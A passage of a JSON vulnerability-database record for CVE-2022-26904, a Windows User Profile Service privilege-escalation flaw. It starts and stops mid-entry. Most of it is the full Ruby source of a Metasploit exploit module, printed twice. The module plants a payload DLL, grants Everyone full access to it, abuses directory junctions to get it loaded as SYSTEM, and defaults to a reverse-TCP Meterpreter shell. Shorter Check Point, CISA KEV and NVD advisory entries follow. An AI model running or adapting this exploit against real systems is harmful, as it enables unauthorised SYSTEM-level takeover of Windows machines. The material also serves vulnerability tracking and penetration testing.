CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialRelease\n fail_with(Failure::NoTarget, 'Target is running Windows, but not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will 
trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. 
For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_26904_superprofile.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-06-14T15:38:05", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "zdt", "title": "Windows User Profile Service Privlege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-12T00:00:00", "id": "1337DAY-ID-37625", "href": "https://0day.today/exploit/description/37625", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. 
This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. 
This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. 
Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. 
Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= 
Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build 
detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! 
Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n 
print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n 
narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/37625", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:40", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows User Profile Service Elevation of Privilege (CVE-2022-21919)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21919"], "modified": "2022-01-11T00:00:00", "id": "CPAI-2022-0003", "href": "", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 
5.9}, "published": "2022-04-25T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21919"], "modified": "2022-04-25T00:00:00", "id": "CISA-KEV-CVE-2022-21919", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": 
"AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2021-34484", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-23T15:30:33", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-34484", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", 
"cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:18:43", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. 
